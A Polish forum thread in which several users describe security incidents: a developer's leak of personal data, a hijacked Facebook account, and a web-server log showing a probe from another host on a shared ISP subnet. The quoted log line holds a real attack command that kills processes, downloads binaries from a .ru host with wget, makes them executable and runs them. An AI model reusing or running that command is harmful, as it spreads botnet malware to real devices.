#dom #deweloperuch właśnie padł ofiarą "zaawansowanego ataku hakerskiego" (pewnie Anetka zostawiła laptopa w kawiarni) i udostępnił hakeruchom poniższe dane na mój temat:

Imię/imiona, nazwiska, adres zamieszkania, adres zameldowania, adres do korespondencji, płeć, obywatelstwo, podpis, data urodzenia, numer i rodzaj dokumentu tożsamości, data ważności i organ wydający dokument tożsamości, NIP, PESEL, numer rachunku bankowego, adres mailowy, numer telefonu, stan cywilny, numer księgi wieczystej, informacja o prowadzonej działalności gospodarczej, stan zadłużenia,
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

Wczoraj wieczorem nagle wskoczyła mi weryfikacja konta na wykopie a teraz moje trollkonto na fejsie zostało przejęte. Ot tak sobie. Fejk konto "wujka janusz fanatyka teorii spiskowych", nie miałem na nim nic wrażliwego więc strata żadna. Ktoś zmienił na nim email oraz hasło a próba odzyskania nie działa, email z kodem weryfikacyjnym w ogóle nie przychodzi na pierwotny adres (poczta na wp.pl). Nie mam też w skrzynce żadnego emaila informującego o nagłej
  • 3
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

@nasser: Prewencyjnie odłączyłem go od internetu, przeskanowałem malwarebytes i niczego nie znalazł. Co jeszcze mogę zrobić, prócz reinstalacji systemu wraz z pełnym wymazaniem partycji?
  • Odpowiedz
postawiłem na WSL http.server w pythonie i wypluł mi on w pewnym momencie taki oto log:

172.20.4x.x - - [30/Dec/2024 18:30:21] "GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+njvwa4+dbda7;wget+http:/\/fniew.eye-network.ru/dbda7;chmod+777+dbda7;./dbda7+jaws;rm+-rf+dbda7;wget+http:/\/fniew.eye-network.ru/wheiuwa4;chmod+777+wheiuwa4;./wheiuwa4+jaws;rm+-rf+wheiuwa4 HTTP/1.1" 404 -


zastanawiam się jakim cudem był on otwarty na świat skoro mam wewnętrzne IP? Mój ISP to mała, osiedlowa firemka i byłem zawsze pewny, że nic ode mnie nie ma prawa nasłuchiwać po drugiej stronie ISPowego switcha, który zapewne jest gdzieś w piwnicy (ale słabo znam się na sieciach).

Moja
  • 3
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

@klamkaodokna:
172.20 to nadal wewnętrzna adresacja. Masz podgląd do konfiguracji na głównym routerze? Obstawiam że maska 24 albo i więcej i wszyscy się widzą wzajemnie.
ISP upchał wielu klientów w 1 podsieci żeby zaoszczędzić na adresacji.
  • Odpowiedz